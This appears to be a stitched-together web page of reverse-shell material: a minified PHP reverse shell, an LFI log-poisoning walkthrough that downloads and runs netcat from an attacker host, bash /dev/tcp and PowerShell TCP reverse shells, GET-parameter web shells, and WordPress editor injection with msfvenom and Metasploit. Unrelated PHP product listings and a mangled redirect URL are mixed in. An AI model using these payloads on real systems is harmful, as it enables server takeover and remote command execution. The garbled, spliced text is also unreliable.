Php Script for Reverse Shell

A php script which provides a reverse shell. After the user successfully downloads, the php file will be extracted and a backdoor password protected 0.0.0.0 shell is created inside the extracted folder. The user needs to download only two files in order to get a reverse shell.

Want to do some good in the world with your PHP knowledge? This app will exploit a target server using a reverse shell and send back useful information such as open ports, OS version derived from banner, etc. This is an absolute gem which will get you up and running quickly.

PHP Reverse Shell File – Minified

(Untested as of now), if you want to be sure, http://pentestmonkey.net/tools/web-shells/php-reverse-shell

<?php set_time_limit(0);$VERSION="1.0";$ip='127.0.0.1';$port=1337;$chunk_size=1400;$write_a=null;$error_a=null;$shell='uname -a; w; id; /bin/sh -i';$daemon=0;$debug=0;if(function_exists('pcntl_fork')){$pid=pcntl_fork();if($pid==-1){printit("ERROR: Can't fork");exit(1);}if($pid){exit(0);}if(posix_setsid()==-1){printit("Error: Can't setsid()");exit(1);}$daemon=1;}else {printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");}chdir("/");umask(0);$sock=fsockopen($ip,$port,$errno,$errstr,30);if(!$sock){printit("$errstr ($errno)");exit(1);}$descriptorspec=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$process=proc_open($shell,$descriptorspec,$pipes);if(!is_resource($process)){printit("ERROR: Can't spawn shell");exit(1);}stream_set_blocking($pipes[0],0);stream_set_blocking($pipes[1],0);stream_set_blocking($pipes[2],0);stream_set_blocking($sock,0);printit("Successfully opened reverse shell to $ip:$port");while(1){if(feof($sock)){printit("ERROR: Shell connection terminated");break;}if(feof($pipes[1])){printit("ERROR: Shell process 
terminated");break;}$read_a=array($sock,$pipes[1],$pipes[2]);$num_changed_sockets=stream_select($read_a,$write_a,$error_a,null);if(in_array($sock,$read_a)){if($debug)printit("SOCK READ");$input=fread($sock,$chunk_size);if($debug)printit("SOCK: $input");fwrite($pipes[0],$input);}if(in_array($pipes[1],$read_a)){if($debug)printit("STDOUT READ");$input=fread($pipes[1],$chunk_size);if($debug)printit("STDOUT: $input");fwrite($sock,$input);}if(in_array($pipes[2],$read_a)){if($debug)printit("STDERR READ");$input=fread($pipes[2],$chunk_size);if($debug)printit("STDERR: $input");fwrite($sock,$input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit($string){if(!$daemon){print"$string\n";}}?>



Let's say that your server has LFI vulnerability or the attacker could upload an evil php script on your web server. In this case i will explore the first condition which is LFI. Let's create a little more difficult scenario for attacker and something more secure for the victim :)
Webserver has Windows 7 machine + Xampp but has one small misconfiguration problem which can lead to a disastrous for a webserver. The admin forgot to disable those variables in php.ini file register_globals and allow_url and allow for an attacker to include a local or remote file into running php code.

Attacker send this code to webserver log file through Netcat




In victim's machine we can see how the previous request saved in log file






Now attacker visits victim's vulnerable web page with his browser








Linux webserver has this tools preinstalled wget,nc,sbd,ncat but what about windows?I leave as an exersice to you and make your own research about other ways which can give a reverse shell. Attacker wants to download netcat from his server and execute it. The following script downloads file from attacker's server



http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=echo+"<?php+$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_connect($socket,'https://www.linkedin.com/redir/invalid-link-page?url=192%2e168%2e1%2e6',8888);socket_recv($socket,$buf,29184,MSG_WAITALL);$file=fopen('backdoor.exe','wb');fwrite($file,$buf);socket_close($socket);?>"+>+downloader.php



Attacker uses netcat listener to upload his file but firstly uses upx to compress netcat.

nc -nlvp 8888 < nc.exe


PHP Reverse Shell (Exec in the background)
Ever found a one-shot PHP command injection vulnerability? The shell will open then immediately die. You can run in the background with this handy function 🙂

In longhand, it looks like this:

function execInBackground($cmd) { 
                if (substr(php_uname(), 0, 7) == "Windows"){ 
                    pclose(popen("start /B ". $cmd, "r"));  
                } 
                else { 
                    exec($cmd . " > /dev/null &");   
                    } 
                } 
            execInBackground("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP_HERE/YOUR_PORT_HERE 0>&1'");
However I’ve done the courtesy of shortening this for you into a one liner below. This will run a command in the background on Windows or Linux (although of course remember you need to change the payload if you’re executing on Windows!

function execInBackground($cmd) { if (substr(php_uname(), 0, 7) == "Windows"){ pclose(popen("start /B ". $cmd, "r"));  } else { exec($cmd . " > /dev/null &"); } } execInBackground("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.221/8081 0>&1'");



Radio Web PHP Script
Radio Web PHP Script
by ekaminc in Images And Media
Software Version: PHP 7.x
Software Framework: CodeIgniter
File Types Included:
JavaScript JSJavaScript JSONHTMLCSSPHPSWF/FLVSQL


Powershell Reverse Shell (Inside Powershell.exe)
$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Clo



ChargePanda - Sell Downloads, Files and Services (PHP Script)
ChargePanda - Sell Downloads, Files and Services (PHP Script)
by ChargePanda in Shopping Carts
Software Version: PHP 7.x, MySQL 5.x
Software Framework: Laravel
File Types Included:
JavaScript JSJavaScript JSONHTMLCSSPHP


Reverse Shell



After successful download it is time for attacker to execute his backdoor and get a remote shell. It setup a new listener in port 7777



Attacker's Box -> nc -nlvp 7777



http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=cmd+/c+backdoor.exe+192.168.1.X+7777+-e+cmd.exe



Powershell Reverse Shell (within cmd)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"



WhoisBooks | Domain Whois Lookup PHP Script
WhoisBooks | Domain Whois Lookup PHP Script
by themelooks in Search
Software Version: PHP 7.x - 8.x
Software Framework: Laravel
File Types Included:
JavaScript JSCSSPHP



Kreta - Social CRM PHP Script
Kreta - Social CRM PHP Script
by thememinister in Project Management Tools
Software Version: PHP 7.x
Software Framework: Laravel
File Types Included:
JavaScript JSJavaScript JSONHTMLCSSPHPSQL


Reverse shell PHP with GET parameters
tillman.oliver
tillman.oliver
·
saved on 3 months ago
I'm using a simple reverse shell php script:

$res = shell_exec($_GET['cmd']));
var_dump($res);
However command using spaces does not work:

shell.php?cmd="ls" works
shell.php?cmd="ls -lh" not working
shell.php?cmd="ls%20-lh" not working
I checked the error.log from my httpd server and the error showed is quite akward:

sh: ls -lh: command not found
I guess it might be due to the encoding of the string received by $_GET but I have no idea how to fix the problem.

shell.php?cmd=ls -lh 



Reverse shell WordPress & Metasploit
 Having already an active session in WordPress to the admin page. We can edit the page source and inject code that can do literally anything when the page is executed.

Appearance -> Editor
 chose “index.php”


 To test we can inject a simple PHP code, in index.php script. The page should show, the text, and perhaps the output of a bash command through ‘cmd’ variable

<?php echo "Vry4n" ?>
<?php echo shell_exec($_GET['cmd']); ?>


 Capturing the traffic with BurpSuite we will analyze the server responses

First picture, we will just see string in the source code ‘Vry4n’


The second time we will visit (http://192.168.0.17/0/index.php?cmd=id)


 Knowing we can print stuff on screen and execute some commands. We can proceed with the reverse connection.

Reverse Shell
From the attacking machine, we will generate a payload using MSFVenom, this will be in PHP language as the site has many PHP scripts already coded

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.13 LPORT=443 -f raw


 Copy this code to the editor in WordPress



 Start a listener in Metasploit

sudo msfdb init
sudo msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.0.13
set LPORT 443
exploit


 Now execute the script by visiting /index.php in the browser

http://192.168.0.17/0/index.php
 The connection should show up now in Metasploit listener



WordPress Plugin editor
Having already access to CMS admin console. You could modify a plugin code and inject whatever you want.

 Go to Plugins - Editor



Locate the script, you want to modify and add. I’d use akismet, usually plugins are stored at /wp-content/plugins

<?php echo "Vry4n" ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.13/443 0>&1'"); ?>



Conclusion

Php Shell is a light weight and faster then netcat for reverse shell.

0 Comments

No Comment.